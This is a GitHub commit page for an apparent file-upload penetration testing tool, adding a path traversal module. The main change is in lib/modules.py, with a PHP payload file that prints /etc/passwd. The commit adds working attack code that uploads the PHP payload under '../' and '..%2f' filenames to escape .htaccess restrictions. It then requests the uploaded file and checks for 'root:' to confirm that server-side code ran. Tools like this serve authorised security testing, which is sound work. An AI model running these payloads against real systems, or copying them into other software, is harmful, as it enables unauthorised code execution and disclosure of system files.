Skip to content

Commit

Permalink
A new module named path traversal is added.
Browse files Browse the repository at this point in the history
  • Loading branch information
@sAjibuu
sAjibuu committed Apr 3, 2024
1 parent af5720e commit 7d55b7a
Show file tree
Hide file tree
Showing 5 changed files with 94 additions and 3 deletions.
1 change: 1 addition & 0 deletions assets/samples/passwd_sample.php
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<?php echo file_get_contents('/etc/passwd'); ?>
4 changes: 2 additions & 2 deletions config/version.json
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
{
"current_version": "v3.0.4#dev",
"current_version": "v3.0.5#dev",
"latest_version": "v3.0.4#dev"
}
}
3 changes: 2 additions & 1 deletion lib/config.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -18,12 +18,13 @@
"null_byte_cutoff",
"name_overflow_cutoff",
"htaccess_overwrite",
"path_traversal",
"svg_xxe",
"svg_xss"
]

# Modules that you do not want to scan with Anti-Malware and Detection mode
dont_scan_module = ['svg_xss', 'svg_xxe', 'htaccess_overwrite']
dont_scan_module = ['svg_xss', 'svg_xxe', 'htaccess_overwrite', "path_traversal"]

# Modules that you want their orginal filename and extension - Don't touch unless you know what you are doing
original_filenames = ['stripping_extension']
Expand Down
2 changes: 2 additions & 0 deletions lib/list_modules.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -33,6 +33,8 @@ def list_all_modules():
print("_" * terminal_width)
print(f"\033[1m\nhtaccess_overwrite\033[0m:\n\nOver-writing the .htaccess rules to allow arbitrary file extension in the current directory and its sub-directories.")
print("_" * terminal_width)
print(f"\033[1m\npath_traversal\033[0m:\n\nBypassing .htaccess rules that apply in the current directory by uploading a file in a parent directory using path traversal vulnerability.")
print("_" * terminal_width)
print(f"\033[1m\nsvg_xxe\033[0m:\n\nUploading SVG with XML-External-Entity that reads the passwd file system.")
print("_" * terminal_width)
print(f"\033[1m\nsvg_xss\033[0m:\n\nUploading SVG with Cross-Site Scripting that executes an alert popup.")
Expand Down
87 changes: 87 additions & 0 deletions lib/modules.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -443,6 +443,93 @@ def htaccess_overwrite(request_file, options, allowed_extension, function_number
overall_progress)


def path_traversal(request_file, options, allowed_extension, function_number, total_functions, internal_progress=None, internal_total_iterations=None, leftover_extensions=None):
extension_to_test = options.file_extension
module = 'path_traversal'

info("Executing path traversal module.")

# Check if the file extension being tested is PHP (it works only with php)
if extension_to_test.lower() == 'php':

def build_url(url, file_name, decode=None):
from urllib.parse import urljoin
from urllib.parse import unquote
upload_dir = options.upload_dir
if options.upload_dir.endswith("=/"):
upload_dir = options.upload_dir[:-1]

if decode:
decoded_filename = unquote(file_name)
final_url = urljoin(url, upload_dir + decoded_filename)
else:
final_url = urljoin(url, upload_dir + file_name)

if "https://" in final_url:
final_url = final_url.replace("https", options.protocol)
else:
final_url = final_url.replace("http", options.protocol)

response, _ = send_get_request(headers, options, final_url)

return response

# Upload .htaccess file that overwrite the existing .htaccess and processes .arbit as PHP
with open("assets/samples/passwd_sample.php", 'rb') as file:
file_data = file.read()

# Calculate the progress bar
overall_progress = (function_number - 1) / total_functions * 100 + (1 / 1) / total_functions * 100

# Upload an arbitrary file extension
php_file_extension = f".php"
magic_bytes = False
mimetype = config.mimetypes["php"]
file_name = "../" + generate_random_string(10) + php_file_extension
skip_module = True # Do not exit when a successful upload is occurred
headers, upload_status, response, url, _, current_time, user_options = file_upload(request_file, file_name,
php_file_extension, options,
magic_bytes, allowed_extension,
mimetype, module,
overall_progress, file_data,
skip_module)
if options.upload_dir != 'optional':

response = build_url(url, file_name)

if upload_status == 'success':
if "root:" not in response.text:
file_name = r"..%2f" + generate_random_string(10) + php_file_extension
headers, upload_status, response, url, _, current_time, user_options = file_upload(request_file, file_name,
php_file_extension, options,
magic_bytes, allowed_extension,
mimetype, module,
overall_progress, file_data,
skip_module)
if upload_status == 'success':

decode = True
second_response = build_url(url, file_name, decode)
if "root:" in second_response.text:
_, _, _, _, _, _, _ = file_upload(request_file, file_name, extension_to_test, options,
magic_bytes, allowed_extension, mimetype, module,
overall_progress)

else:
printing(options, user_options, response, file_name, 100, current_time, module, magic_bytes, mimetype)
warning(f"It seems like the app is not vulnerable to path traversal.")
return

elif "root:" in response.text:
_, _, _, _, _, _, _ = file_upload(request_file, file_name, extension_to_test, options,
magic_bytes, allowed_extension, mimetype, module,
overall_progress)

else:
printing(options, user_options, response, file_name, 100, current_time, module, magic_bytes, mimetype)
warning(f"It seems like the app is not vulnerable to path traversal.")
return

def svg_xxe(request_file, options, allowed_extension, function_number, total_functions, internal_progress=None, internal_total_iterations=None, leftover_extensions=None):
module = 'svg_xxe'

Expand Down

0 comments on commit 7d55b7a

Please sign in to comment.